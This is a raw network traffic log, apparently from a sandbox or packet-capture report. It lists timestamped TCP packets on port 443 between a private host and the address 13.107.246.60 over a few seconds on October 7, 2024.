                Oct 7, 2024 03:27:09.855137110 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.855153084 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.855161905 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.855168104 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.858261108 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.858314037 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.858380079 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.858613968 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.858629942 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.935215950 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.936156988 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.936197042 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.936268091 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.936275959 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.944358110 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.944730043 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.944772005 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.944777966 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.944834948 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.944876909 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.944894075 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.944909096 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.944915056 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.947923899 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.947964907 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.948033094 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.948185921 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.948196888 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.014940023 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.015408039 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.015427113 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.015927076 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.015932083 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.039484024 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.039520025 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.039562941 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.039572954 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.039614916 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.039830923 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.039844990 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.039868116 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.039875031 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.042944908 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.042994022 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.043067932 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.043243885 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.043260098 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.117160082 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.119646072 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.119707108 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.124398947 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.124413967 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.124423981 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.124428988 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.134227991 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.141403913 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.141510963 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.141587973 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.142537117 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.142574072 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.144037962 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.144051075 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.162810087 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.162851095 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.245573997 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.245614052 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.245667934 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.245676041 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.245740891 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.262795925 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.262842894 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.262892008 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.262907982 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.325443983 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.325541019 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.325622082 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.328185081 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.328222036 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.497308016 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.499000072 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.499058962 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.499780893 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.499794960 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.595619917 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.595887899 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.595949888 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.609025002 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.618060112 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.618060112 CEST49909443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.618099928 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.618123055 CEST4434990913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.625446081 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.625463963 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.626718044 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.626728058 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.634604931 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.634694099 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.634776115 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.637473106 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.637511015 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.685117960 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.690233946 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.690293074 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.692219019 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.692234039 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.725523949 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.725575924 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.725708961 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.725749969 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.725999117 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.728390932 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.728390932 CEST49910443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.728420973 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.728493929 CEST4434991013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.741075039 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.741173029 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.741414070 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.746452093 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.746493101 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.786895037 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.786989927 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.787045956 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.787082911 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.787158012 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.789752007 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.789771080 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.789797068 CEST49911443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.789803982 CEST4434991113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.806816101 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.806866884 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.807045937 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.808178902 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.808197975 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.834693909 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.838654995 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.838676929 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.839426041 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.839432955 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.939728975 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.939805031 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.939848900 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.940876961 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.942403078 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.942428112 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.943876982 CEST49912443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.943886995 CEST4434991213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.950725079 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.950772047 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:10.951623917 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.952883005 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:10.952896118 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.012757063 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.014013052 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.014036894 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.014926910 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.014933109 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.118469954 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.118748903 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.118818045 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.120043039 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.120043039 CEST49913443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.120084047 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.120110035 CEST4434991313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.124201059 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.124249935 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.124619961 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.125766039 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.125797033 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.290693045 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.291507959 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.291533947 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.291735888 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.291740894 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.388480902 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.388600111 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.388771057 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.391360998 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.391360998 CEST49914443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.391422033 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.391448021 CEST4434991413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.412921906 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.414917946 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.414956093 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.415051937 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.418612003 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.418612003 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.418661118 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.418745995 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.419079065 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.419091940 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.453826904 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.455005884 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.455015898 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.465893030 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.465898991 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.517725945 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.517894030 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.518281937 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.518281937 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.519890070 CEST49915443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.519920111 CEST4434991513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.529721022 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.529793978 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.529975891 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.531903982 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.531932116 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.560782909 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.561647892 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.561712980 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.561739922 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.562452078 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.562452078 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.562891006 CEST49916443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.562906981 CEST4434991613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.574199915 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.574290991 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.575368881 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.577765942 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.577797890 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.607048988 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.611537933 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.611582041 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.612200975 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.612207890 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.767085075 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.768462896 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.768500090 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.769365072 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.769373894 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.808063030 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.808132887 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.808193922 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.808666945 CEST49917443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.808696985 CEST4434991713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.816273928 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.816318989 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.816379070 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.816910982 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.816926003 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.866777897 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.866837025 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.866877079 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.866882086 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.866930962 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.880333900 CEST49918443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.880364895 CEST4434991813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.900635958 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.900686026 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:11.900746107 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.901834011 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:11.901844978 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.073537111 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.074817896 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.074841022 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.076342106 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.076350927 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.174843073 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.175003052 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.175059080 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.177256107 CEST49919443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.177273035 CEST4434991913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.180342913 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.184047937 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.184129953 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.185251951 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.185266018 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.194772005 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.194866896 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.194941998 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.196187973 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.196222067 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.249056101 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.280865908 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.281100988 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.281152964 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.281183004 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.281219959 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.281267881 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.299088001 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.299138069 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.300179005 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.300185919 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.300961018 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.300991058 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.301018000 CEST49920443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.301032066 CEST4434992013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.339919090 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.339951992 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.340008020 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.340482950 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.340495110 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.400190115 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.400345087 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.400407076 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.400544882 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.400568962 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.400584936 CEST49921443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.400592089 CEST4434992113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.404900074 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.404922009 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.404972076 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.405352116 CEST49926443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.405369997 CEST4434992613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.452877998 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.453294039 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.453310966 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.453732014 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.453737974 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.544970989 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.547374964 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.547420025 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.548269033 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.548280001 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.551889896 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.552087069 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.552135944 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.552253008 CEST49922443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.552265882 CEST4434992213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.561482906 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.561549902 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.561619997 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.561925888 CEST49927443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.561958075 CEST4434992713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.643023968 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.643241882 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.643304110 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.645334005 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.645354986 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.645379066 CEST49923443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.645390987 CEST4434992313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.659991980 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.660088062 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.660156965 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.664165020 CEST49928443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.664202929 CEST4434992813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.865067959 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.865535975 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.865613937 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.866010904 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.866024017 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.967175007 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.967508078 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.969820976 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.969821930 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.970446110 CEST49924443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.970479012 CEST4434992413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.976977110 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.977015972 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.977314949 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.977314949 CEST49929443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.977344990 CEST4434992913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.985989094 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.988504887 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.988504887 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:12.988514900 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:12.988527060 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.083705902 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.083894014 CEST4434992513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:13.084784985 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.085671902 CEST49925443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:13.085671902 CEST49925443192.168.2.413.107.246.60
